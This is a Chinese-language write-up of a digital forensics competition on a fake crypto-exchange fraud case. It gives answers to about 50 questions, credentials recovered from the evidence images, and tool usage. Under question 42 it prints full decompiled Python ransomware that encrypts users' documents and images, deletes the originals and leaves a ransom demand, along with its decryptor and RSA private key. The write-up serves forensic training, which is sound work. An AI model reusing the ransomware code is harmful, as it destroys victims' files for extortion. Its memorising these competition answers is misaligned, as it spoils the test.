VC容器密码为:2022.4th.changancup!
##没有翻墙捏 审核老师
背景
某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗,该网站号称使用“USTD币”购买所谓的“HT币”,受害人充值后不但“HT币”无法提现、交易,而且手机还被恶意软件锁定勒索。警方根据受害人提供的虚拟币交易网站调取了对应的服务器镜像并对案件展开侦查。
检材1
1. 检材1的SHA256值为
9E48BB2CAE5C1D93BAF572E3646D2ECD26080B70413DC7DC4131F88289F49E34
2. 分析检材1,搭建该服务器的技术员IP地址是多少?用该地址解压检材2
172.16.80.100
3. 检材1中,操作系统发行版本号为
法一:
法二:etc目录下redhat-release
4. 检材1系统中,网卡绑定的静态IP地址为
法一:
法二:
老思路
既然是static的,那就编辑虚拟网络编辑器,直接配置虚拟机的网段
直接连X-shell
5. 检材1中,网站jar包所存放的目录是(答案为绝对路径,如“/home/honglian/”)
历史命令一看就有
传到本机全部解压(这里用jadx看也没问题的!)
为下一题做准备
6. 检材1中,监听7000端口的进程对应文件名为
cloud.jar
一个个打开看,最后在cloud文件夹里找到7000端口
这里发现每个配置文件都有数据库的信息,以192和172开头,记一下后面说不定有用
尝试登陆
不行!
7. 检材1中,网站管理后台页面对应的网络端口为(答案填写阿拉伯数字,如“100”)
检材二中找到
9090
这里就要把网站启动起来了,但是缺了很多配置条件,先跳转到检材三进行
通过检材二给的密码解开检材三
检材三里面是检材一jar包里提到过的172开头的spring.datasource.url
火眼跑不出来,遂仿真后用取证大师分析
通过终端命令可以看到有docker
有zookeeper
有mysql
kafka
redis
mongod
看一下网络配置,也是静态的
因为有sql,尝试打开
那么可以确定mysql在docker中
直接起
33050映射到3306端口,跟jar包对上
那就可以尝试启动myssql,密码在jar包里
docker exec -it 8e /bin/bash
分析检材二联系一下,应该128是后端,133是前端
此外还找到登陆界面
以及建站笔记
#!/bin/bash sleep 2s echo "Starting Zookeeper" nohup /data/install/apache/zookeeper-3.4.10/bin/zkServer.sh start & sleep 2s echo "Starting Kafka" nohup /data/install/apache/kafka_2.12-1.0.1/bin/zookeeper-server-start.sh /data/install/apache/kafka_2.12-1.0.1/config/zookeeper.properties & sleep 5s nohup /data/install/apache/kafka_2.12-1.0.1/bin/kafka-server-start.sh /data/install/apache/kafka_2.12-1.0.1/config/server.properties & echo "Finish"kil
#!/bin/bash echo "Starting App: Cloud " nohup java -jar /web/app/cloud.jar & sleep 20s echo "Starting App: market " nohup java -jar /web/app/market.jar & sleep 60s echo "Starting App:exchange " nohup java -jar /web/app/exchange.jar & sleep 20s echo "Starting App:admin" nohup java -jar /web/app/admin-api.jar & sleep 20s echo "Starting App:ucenter" nohup java -jar /web/app/ucenter-api.jar & sleep 20s echo "Starting WEB:WEB" cd /web/app/web/ nohup npm run dev & cd /web/app echo "Starting WEB:admin" cd /web/app/admin/ nohup npm run dev & cd /web/app echo "Finish"kil
将检材二数据库备份导入
再将start.sh导入/web
导入后记得要chmod 777给权限
然后就可以启动start.sh后端服务
同理启动前端
欧了
以及网站前台
8. 检材1中,网站前台页面里给出的APK的下载地址是(答案格式如下:“https://www.forensix.cn/abc/def”)
https://pan.forensix.cn/f/c45ca511c7f2469090ad/?dl=1
9. 检材1中,网站管理后台页面调用的用户表(admin)里的密码字段加密方式为
MD5
发现调用了in方法
去jar包里搜一下
10. 分析检材1,网站管理后台登录密码加密算法中所使用的盐值是
跳转
是个全局变量
在application.properties中可以找到
检材二
11. 检材2中,windows账户Web King的登录密码是
135790
12. 检材2中,除检材1以外,还远程连接过哪个IP地址?并用该地址解压检材3
172.16.80.128
13. 检材2中,powershell中输入的最后一条命令是
火眼看不到,那就仿真去看
14. 检材2中,下载的涉案网站源代码文件名为
ZTuoExchange_framework-master.zip
15. 检材2中,网站管理后台root账号的密码为
root
16. 检材2中,技术员使用的WSL子系统发行版本是(答案格式如下:windows 10.1)
Ubuntu 20.04
或者去wsl目录下找
一般在users/appdata/local/package下
17. 检材2中,运行的数据库服务版本号是(答案格式如下:10.1)
8.0.30
或者直接在wsl里看
18. 上述数据库debian-sys-maint用户的初始密码是
/etc/mysql/debian.cnf
ZdQfi7vaXjHZs75M
检材三
19. 检材3服务器root账号的密码是
检材二远程连接过检材三,在检材三重置密码后进去可以看到ip对上了
h123456
20. 检材3中,监听33050端口的程序名(program name)为
docker-proxy
21. 除MySQL外,该网站还依赖以下哪种数据库
前面在配置文件里找到过的
redis
mongodb
22. 检材3中,MySQL数据库root账号的密码是
前面有
shhl7001
23. 检材3中,MySQL数据库在容器内部的数据目录为
从历史记录分析可以得出嫌疑人曾经多次查看docker-compose.yml,在/data/mysql
里面
/var/lib/mysql
[root@localhost mysql]# cat docker-compose.yml
version: '3'
services:
mysql:
image: "mysql:5.7.32"
restart: always
container_name: mysql57
environment:
MYSQL_ROOT_PASSWORD: shhl7001
TZ: Asia/Shanghai
command:
--default-authentication-plugin=mysql_native_password
--character-set-server=utf8mb4
--collation-server=utf8mb4_general_ci
--explicit_defaults_for_timestamp=true
--lower_case_table_names=1
--max_allowed_packet=128M
ports:
- 33050:3306
volumes:
- /data/mysql/db:/var/lib/mysql
- /data/mysql/conf/my.cnf:/etc/mysql/my.cnf
或者搜索常见数据文件
24. 涉案网站调用的MySQL数据库名为
b1
25. 勒索者在数据库中修改了多少个用户的手机号?(答案填写阿拉伯数字,如“15”)
3
26. 勒索者在数据库中删除的用户数量为(答案填写阿拉伯数字,如“15”)
28
27. 还原被破坏的数据库,分析除技术员以外,还有哪个IP地址登录过管理后台网站?用该地址解压检材4
172.16.80.197
28. 还原全部被删改数据,用户id为500的注册会员的HT币钱包地址为
cee631121c2ec9232f3a2f028ad5c89b
29. 还原全部被删改数据,共有多少名用户的会员等级为’LV3’(答案填写阿拉伯数字,如“15”)
有重复数据
167-3=164
30. 还原全部被删改数据,哪些用户ID没有充值记录(答案填写阿拉伯数字,多个ID以逗号分隔,如“15,16,17”)
SELECT DISTINCT id from b1.member where b1.member.id not in (SELECT member_id from b1.member_transaction)
318,989
31. 还原全部被删改数据,2022年10月17日总计产生多少笔交易记录?(答案填写阿拉伯数字,如“15”)
1000
32. 还原全部被删改数据,该网站中充值的USDT总额为(答案填写阿拉伯数字,如“15”)
415710
检材4
33. 嫌疑人使用的安卓模拟器软件名称是
夜神模拟器
34. 检材4中,“老板”的阿里云账号是
发现可以用解压软件打开
有个vmdk文件,放在火眼里面打开
可以看到这个人就是老板
forensixtech1
35. 检材4中安装的VPN工具的软件名称是
v2rayNG
36. 上述VPN工具中记录的节点IP是
同上图
38.68.135.18
37. 检材4中,录屏软件安装时间为
2022-10-19 10:50:27
38. 上述录屏软件中名为“s_20221019105129”的录像,在模拟器存储中对应的原始文件名为
去文件夹里面找
s_20221019105129
找到了
39. 上述录屏软件登录的手机号是
18645091802
有db文件的wal文件,wal文件用来临时存储要写入数据库的信息,一起导出
40. 检材4中,发送勒索邮件的邮箱地址为
skterran@163.com
41. 分析加密程序,编译该加密程序使用的语言是
全局搜索,发现加解密软件也在同一目录
直接可以看出python
42. 分析加密程序,它会加密哪些扩展名的文件?
想办法破解
创建个.py文件,添加以下代码
"""
PyInstaller Extractor v1.9 (Supports pyinstaller 3.3, 3.2, 3.1, 3.0, 2.1, 2.0)
Author : Extreme Coders
E-mail : extremecoders(at)hotmail(dot)com
Web : https://0xec.blogspot.com
Date : 29-November-2017
Url : https://sourceforge.net/projects/pyinstallerextractor/
For any suggestions, leave a comment on
https://forum.tuts4you.com/topic/34455-pyinstaller-extractor/
This script extracts a pyinstaller generated executable file.
Pyinstaller installation is not needed. The script has it all.
For best results, it is recommended to run this script in the
same version of python as was used to create the executable.
This is just to prevent unmarshalling errors(if any) while
extracting the PYZ archive.
Usage : Just copy this script to the directory where your exe resides
and run the script with the exe file name as a parameter
C:\path\to\exe\>python pyinstxtractor.py <filename>
$ /path/to/exe/python pyinstxtractor.py <filename>
Licensed under GNU General Public License (GPL) v3.
You are free to modify this source.
CHANGELOG
================================================
Version 1.1 (Jan 28, 2014)
-------------------------------------------------
- First Release
- Supports only pyinstaller 2.0
Version 1.2 (Sept 12, 2015)
-------------------------------------------------
- Added support for pyinstaller 2.1 and 3.0 dev
- Cleaned up code
- Script is now more verbose
- Executable extracted within a dedicated sub-directory
(Support for pyinstaller 3.0 dev is experimental)
Version 1.3 (Dec 12, 2015)
-------------------------------------------------
- Added support for pyinstaller 3.0 final
- Script is compatible with both python 2.x & 3.x (Thanks to Moritz Kroll @ Avira Operations GmbH & Co. KG)
Version 1.4 (Jan 19, 2016)
-------------------------------------------------
- Fixed a bug when writing pyc files >= version 3.3 (Thanks to Daniello Alto: https://github.com/Djamana)
Version 1.5 (March 1, 2016)
-------------------------------------------------
- Added support for pyinstaller 3.1 (Thanks to Berwyn Hoyt for reporting)
Version 1.6 (Sept 5, 2016)
-------------------------------------------------
- Added support for pyinstaller 3.2
- Extractor will use a random name while extracting unnamed files.
- For encrypted pyz archives it will dump the contents as is. Previously, the tool would fail.
Version 1.7 (March 13, 2017)
-------------------------------------------------
- Made the script compatible with python 2.6 (Thanks to Ross for reporting)
Version 1.8 (April 28, 2017)
-------------------------------------------------
- Support for sub-directories in .pyz files (Thanks to Moritz Kroll @ Avira Operations GmbH & Co. KG)
Version 1.9 (November 29, 2017)
-------------------------------------------------
- Added support for pyinstaller 3.3
- Display the scripts which are run at entry (Thanks to Michael Gillespie @ malwarehunterteam for the feature request)
"""
from __future__ import print_function
import os
import struct
import marshal
import zlib
import sys
import imp
import types
from uuid import uuid4 as uniquename
class CTOCEntry:
def __init__(self, position, cmprsdDataSize, uncmprsdDataSize, cmprsFlag, typeCmprsData, name):
self.position = position
self.cmprsdDataSize = cmprsdDataSize
self.uncmprsdDataSize = uncmprsdDataSize
self.cmprsFlag = cmprsFlag
self.typeCmprsData = typeCmprsData
self.name = name
class PyInstArchive:
PYINST20_COOKIE_SIZE = 24 # For pyinstaller 2.0
PYINST21_COOKIE_SIZE = 24 + 64 # For pyinstaller 2.1+
MAGIC = b'MEI\014\013\012\013\016' # Magic number which identifies pyinstaller
def __init__(self, path):
self.filePath = path
def open(self):
try:
self.fPtr = open(self.filePath, 'rb')
self.fileSize = os.stat(self.filePath).st_size
except:
print('[*] Error: Could not open {0}'.format(self.filePath))
return False
return True
def close(self):
try:
self.fPtr.close()
except:
pass
def checkFile(self):
print('[*] Processing {0}'.format(self.filePath))
# Check if it is a 2.0 archive
self.fPtr.seek(self.fileSize - self.PYINST20_COOKIE_SIZE, os.SEEK_SET)
magicFromFile = self.fPtr.read(len(self.MAGIC))
if magicFromFile == self.MAGIC:
self.pyinstVer = 20 # pyinstaller 2.0
print('[*] Pyinstaller version: 2.0')
return True
# Check for pyinstaller 2.1+ before bailing out
self.fPtr.seek(self.fileSize - self.PYINST21_COOKIE_SIZE, os.SEEK_SET)
magicFromFile = self.fPtr.read(len(self.MAGIC))
if magicFromFile == self.MAGIC:
print('[*] Pyinstaller version: 2.1+')
self.pyinstVer = 21 # pyinstaller 2.1+
return True
print('[*] Error : Unsupported pyinstaller version or not a pyinstaller archive')
return False
def getCArchiveInfo(self):
try:
if self.pyinstVer == 20:
self.fPtr.seek(self.fileSize - self.PYINST20_COOKIE_SIZE, os.SEEK_SET)
# Read CArchive cookie
(magic, lengthofPackage, toc, tocLen, self.pyver) = \
struct.unpack('!8siiii', self.fPtr.read(self.PYINST20_COOKIE_SIZE))
elif self.pyinstVer == 21:
self.fPtr.seek(self.fileSize - self.PYINST21_COOKIE_SIZE, os.SEEK_SET)
# Read CArchive cookie
(magic, lengthofPackage, toc, tocLen, self.pyver, pylibname) = \
struct.unpack('!8siiii64s', self.fPtr.read(self.PYINST21_COOKIE_SIZE))
except:
print('[*] Error : The file is not a pyinstaller archive')
return False
print('[*] Python version: {0}'.format(self.pyver))
# Overlay is the data appended at the end of the PE
self.overlaySize = lengthofPackage
self.overlayPos = self.fileSize - self.overlaySize
self.tableOfContentsPos = self.overlayPos + toc
self.tableOfContentsSize = tocLen
print('[*] Length of package: {0} bytes'.format(self.overlaySize))
return True
def parseTOC(self):
# Go to the table of contents
self.fPtr.seek(self.tableOfContentsPos, os.SEEK_SET)
self.tocList = []
parsedLen = 0
# Parse table of contents
while parsedLen < self.tableOfContentsSize:
(entrySize, ) = struct.unpack('!i', self.fPtr.read(4))
nameLen = struct.calcsize('!iiiiBc')
(entryPos, cmprsdDataSize, uncmprsdDataSize, cmprsFlag, typeCmprsData, name) = \
struct.unpack( \
'!iiiBc{0}s'.format(entrySize - nameLen), \
self.fPtr.read(entrySize - 4))
name = name.decode('utf-8').rstrip('\0')
if len(name) == 0:
name = str(uniquename())
print('[!] Warning: Found an unamed file in CArchive. Using random name {0}'.format(name))
self.tocList.append( \
CTOCEntry( \
self.overlayPos + entryPos, \
cmprsdDataSize, \
uncmprsdDataSize, \
cmprsFlag, \
typeCmprsData, \
name \
))
parsedLen += entrySize
print('[*] Found {0} files in CArchive'.format(len(self.tocList)))
def extractFiles(self):
print('[*] Beginning extraction...please standby')
extractionDir = os.path.join(os.getcwd(), os.path.basename(self.filePath) + '_extracted')
if not os.path.exists(extractionDir):
os.mkdir(extractionDir)
os.chdir(extractionDir)
for entry in self.tocList:
basePath = os.path.dirname(entry.name)
if basePath != '':
# Check if path exists, create if not
if not os.path.exists(basePath):
os.makedirs(basePath)
self.fPtr.seek(entry.position, os.SEEK_SET)
data = self.fPtr.read(entry.cmprsdDataSize)
if entry.cmprsFlag == 1:
data = zlib.decompress(data)
# Malware may tamper with the uncompressed size
# Comment out the assertion in such a case
assert len(data) == entry.uncmprsdDataSize # Sanity Check
with open(entry.name, 'wb') as f:
f.write(data)
if entry.typeCmprsData == b's':
print('[+] Possible entry point: {0}'.format(entry.name))
elif entry.typeCmprsData == b'z' or entry.typeCmprsData == b'Z':
self._extractPyz(entry.name)
def _extractPyz(self, name):
dirName = name + '_extracted'
# Create a directory for the contents of the pyz
if not os.path.exists(dirName):
os.mkdir(dirName)
with open(name, 'rb') as f:
pyzMagic = f.read(4)
assert pyzMagic == b'PYZ\0' # Sanity Check
pycHeader = f.read(4) # Python magic value
if imp.get_magic() != pycHeader:
print('[!] Warning: The script is running in a different python version than the one used to build the executable')
print(' Run this script in Python{0} to prevent extraction errors(if any) during unmarshalling'.format(self.pyver))
(tocPosition, ) = struct.unpack('!i', f.read(4))
f.seek(tocPosition, os.SEEK_SET)
try:
toc = marshal.load(f)
except:
print('[!] Unmarshalling FAILED. Cannot extract {0}. Extracting remaining files.'.format(name))
return
print('[*] Found {0} files in PYZ archive'.format(len(toc)))
# From pyinstaller 3.1+ toc is a list of tuples
if type(toc) == list:
toc = dict(toc)
for key in toc.keys():
(ispkg, pos, length) = toc[key]
f.seek(pos, os.SEEK_SET)
fileName = key
try:
# for Python > 3.3 some keys are bytes object some are str object
fileName = key.decode('utf-8')
except:
pass
# Make sure destination directory exists, ensuring we keep inside dirName
destName = os.path.join(dirName, fileName.replace("..", "__"))
destDirName = os.path.dirname(destName)
if not os.path.exists(destDirName):
os.makedirs(destDirName)
try:
data = f.read(length)
data = zlib.decompress(data)
except:
print('[!] Error: Failed to decompress {0}, probably encrypted. Extracting as is.'.format(fileName))
open(destName + '.pyc.encrypted', 'wb').write(data)
continue
with open(destName + '.pyc', 'wb') as pycFile:
pycFile.write(pycHeader) # Write pyc magic
pycFile.write(b'\0' * 4) # Write timestamp
if self.pyver >= 33:
pycFile.write(b'\0' * 4) # Size parameter added in Python 3.3
pycFile.write(data)
def main():
if len(sys.argv) < 2:
print('[*] Usage: pyinstxtractor.py <filename>')
else:
arch = PyInstArchive(sys.argv[1])
if arch.open():
if arch.checkFile():
if arch.getCArchiveInfo():
arch.parseTOC()
arch.extractFiles()
arch.close()
print('[*] Successfully extracted pyinstaller archive: {0}'.format(sys.argv[1]))
print('')
print('You can now use a python decompiler on the pyc files within the extracted directory')
return
arch.close()
if __name__ == '__main__':
main()
cmd下
python .py .exe
pyc文件,uncompyle6反编译pyc
uncompyle6 -o test.py test.pyc
import time
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
import os
pubkey = '-----BEGIN PUBLIC KEY-----\nMIIBIzANBgkqhkiG9w0BAQEFAAOCARAAMIIBCwKCAQEAx5JF4elVDBaakgGeDSxI\nCO1LyyZ6B2TgR4DNYiQoB1zAyWPDwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVo\nbHVZh+rCI4MwAh+EBFUeT8Dzja4ZlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRn\nHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2fUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYzi\nSOT4PCf/O12Kuu9ZklsIAihRPl10SmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhz\nRDFn9IQ6YQRjlLjuOX8WB6H4NbnKX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/I\nkwIEHoau+w==\n-----END PUBLIC KEY-----\n'
msg = "SOMETHING WENT WRONG,PLEASE CONTACT YOUR SYSTEM ADMINISTRATOR!\nHe can help you to understand whats happened.\nIf he can't help you,contact us via email:\naa1028@forensix.cn\nale@forensix.cn\nHURRY UP!WE HAVE ANTIDOTE FOR YOUR FILES!DISCOUNT 20%FOR CLIENTS,WHO CONTACT US IN THE SAME DAY!\nYou can attach 2 files (text or picture)to check our honest intentions,we will heal them and send\nback.\nPlease pay 0.618 ETH\nThe wallet address:0xef9edf6cdacb7d925aee0f9bd607b544c5758850\n************************************\n"
class XORCBC:
def __init__(self, key: bytes):
self.key = bytearray(key)
self.cur = 0
def encrypt(self, data: bytes) -> bytes:
data = bytearray(data)
for i in range(len(data)):
tmp = data[i]
data[i] ^= self.key[self.cur]
self.key[self.cur] = tmp
self.cur = (self.cur + 1) % len(self.key)
return bytes(data)
print('加密程序V1.0')
print('文件正在加密中~~~~~~~~~~~~~~~~~~\n')
def run_finall():
for filepath, dirnames, filenames in os.walk(os.getcwd()):
for filename in filenames:
if filename != 'encrypt_file.py' and filename != 'decrypt_file.py' and '_encrypted' not in filename:
ExtensionPath = os.path.splitext(filename)[(-1)]
if '.txt' == ExtensionPath or '.jpg' == ExtensionPath or '.xls' == ExtensionPath or '.docx' == ExtensionPath:
time.sleep(3)
data_file = os.path.join(filepath, filename)
rsakey = RSA.import_key(pubkey)
cipher = Cipher_pkcs1_v1_5.new(rsakey)
xor_key = os.urandom(16)
xor_obj = XORCBC(xor_key)
outf = open(data_file + '_encrypted', 'wb')
encrypted_xor_key = cipher.encrypt(xor_key)
outf.write(encrypted_xor_key)
buffer_size = 4096
with open(data_file, 'rb') as (f):
while True:
data = f.read(buffer_size)
if not data:
break
outf.write(xor_obj.encrypt(data))
outf.close()
os.remove(data_file)
run_finall()
def redme():
try:
dir = os.path.join(os.path.expanduser('~'), 'Desktop')
print(dir)
with open(dir + '/!READ_ME.txt', 'w') as (ff):
ff.write(msg)
except:
dir1 = os.getcwd()
print(dir1)
with open(dir1 + '/!READ_ME.txt', 'w') as (ff):
ff.write(msg)
print('\n加密完成~~~~~~~~~~~~~~~~~~')
os.system('pause')
# okay decompiling encrypt_file_1.pyc
txt,jpg,xls,docx
43. 分析加密程序,是通过什么算法对文件进行加密的?
异或
^= 异或符
44. 分析加密程序,其使用的非对称加密方式公钥后5位为?
u+w==
45. 被加密文档中,FLAG1的值是(FLAG为8位字符串,如“FLAG9:QWERT123”)
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
import os
prikey = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAx5JF4elVDBaakgGeDSxICO1LyyZ6B2TgR4DNYiQoB1zAyWPD\nwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVobHVZh+rCI4MwAh+EBFUeT8Dzja4Z\nlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRnHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2\nfUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYziSOT4PCf/O12Kuu9ZklsIAihRPl10\nSmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhzRDFn9IQ6YQRjlLjuOX8WB6H4NbnK\nX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/IkwIEHoau+wKCAQAlhHEjPTFQ7suY\nU3Ji+L5TyeaFWYu3iDVmtzUTjUn2Yvr2+IyHKdU6z0vvGhsHYP8rUJcwWEBVaVbU\ndQZ8TXT0flBgC35NyGQnTHHbNsOWRvFpto0Gom5KuDS0DYPrm+Ic1Ev0SfLdY+iK\nV/uzjjeBF+CgEuvwO8xnYLsaFu6s0/ezQgEDBxpcN2KBBZoJ0eXxUUanEPkrLHA2\nDhRgUCKQks1kpJrGZp/DLb8dKfhWoQ1FV/bBsmv9lVj1Yk14oKdvb51QK53Mnhiz\nji49S+tazVCA+lP0M6lVSB2uLyB5JldT4kqOQvhtURSzW8oeTM9w1rLvW7qi823U\nWrJz+TQTAoGBAPIfUS9accG2fUA3AP93ZJU0SbZLc95JJXMyaRozFTTbxnMWB3sG\nqM9X1qZ4hECVvLF3Sn73B6kF3IaC8/Vpc2cyPHpM+ytdxZVm4uW75ZwYAvKEJeT3\n068CtcN6PvG3mFhvPsc3GK9FI1O63jrbSx+Y1hQlrVq6eMZUJh7V8BxXAoGBANMC\nmhN2sC85Pz450JNoG6Q3db0nm9kUs157TUBMGJCfvgh2Rj0t08FcEKQn+idtOf6Z\nZc2lRoLeaRq539Ex8zzsD7Dl7bFtePRsuDcAMuIFY2S0Z8jjj9BaCirrUluu1FWp\nTV60As9YBLnRosLTrYtgym+GNjdE/42uFRBJk9AlAoGBAIyGeStBbau1BmMSeTJt\n9QYjl95MJZXTbJD4IFV73nVG66I/yKp9Ry3Q1hHf/oDm6bepslI/7+lLK1TPRv7T\nO0PNY92vya15RUvFerOz2QvOz9SRh/ZU6rEwsy0qZtanGZ7pKCSsQIwcJcsTKdjO\nvMj9QIqxqmdpdh6zFDeGKu4/AoGAEzFuMCQH+liRp9MEZtEtoqtUSwbwhSUh4hl+\nnScp+a+sKIaF/ohJfXeBctWCF6iU/N5TH7SlnfBlZE7MBJHiiAz8EwWI4u4EmFkc\n7RvmfXowLO9L4pG2rzwcMGgrs9cJm+NcjlNmq+Kx4q+F4lHNN8+/7NPdmDyiUlAD\nATZCds8CgYEA2CFvsH+TUV3Q63UdTsdrUKK86vohjGSaoai7mEUGo4iZ/Ie+ScAa\nGtPFZUhO7EJqh2rNqAakfZGgKU43hAjiUHIjvZdAFNoqpNxO+bkEIPSFQQ6o34r3\naGTj9Pz1UH/ByW76V7defT/2jQsXHHFiVGpDU6WT80bInLqDQRxlDRk=\n-----END RSA PRIVATE KEY-----\n'
class XORCBC:
def __init__(self, key: bytes):
self.key = bytearray(key)
self.cur = 0
def decrypt(self, data: bytes) -> bytes:
data = bytearray(data)
for i in range(len(data)):
data[i] ^= self.key[self.cur]
self.key[self.cur] = data[i]
self.cur = (self.cur + 1) % len(self.key)
return bytes(data)
def run_decrypt():
print('解密程序 V1.0\n')
present = input('请输入密码:')
if present == '4008003721':
for filepath, dirnames, filenames in os.walk(os.getcwd()):
for filename in filenames:
if '_encrypted' in filename:
print(os.path.join(filepath, filename) + '-解密成功')
data_file = os.path.join(filepath, filename)
data_handle = open(data_file, 'rb')
rsakey = RSA.import_key(prikey)
cipher = Cipher_pkcs1_v1_5.new(rsakey)
xor_key = cipher.decrypt(data_handle.read(256), '')
xor_obj = XORCBC(xor_key)
outname = data_file.replace('_encrypted', '')
outf = open(outname, 'wb')
buffer_size = 4096
while True:
data = data_handle.read(buffer_size)
if not data:
break
outf.write(xor_obj.decrypt(data))
outf.close()
print('\n恭喜您,解密成功~~~~~~~~~~~~~~~')
os.system('pause')
else:
print('\n密码错误~~~~~~~~~~~~~~~')
run_decrypt()
run_decrypt()
# okay decompiling decrypt_file_1.pyc
反编译后同得密码为4008003721
直接运行
TREFWGFS
46. 恶意APK程序的包名为
去找找apk文件在哪捏
不知道是不是我的问题,倒不出来,我用前面服务器那边二维码链接来下的
丢到雷电
cn.forensix.changancup
47. APK调用的权限包括
48. 解锁第一关所使用的FLAG2值为(FLAG为8位字符串,如需在apk中输入FLAG,请输入完整内容,如输入"FLAG9:QWERT123")
要是直接打开你手机锁掉啦
jadxgui打开直接搜索
FLAG2:MATSFRKG
49. 解锁第二关所使用的FLAG3值为(FLAG为8位字符串,如需在apk中输入FLAG,请输入完整内容,如输入"FLAG9:QWERT123")
这里是第二关代码
剩下的部分沉淀会再回来,先到此为止!
50. 解锁第三关所需的KEY值由ASCII可显示字符组成,请请分析获取该KEY值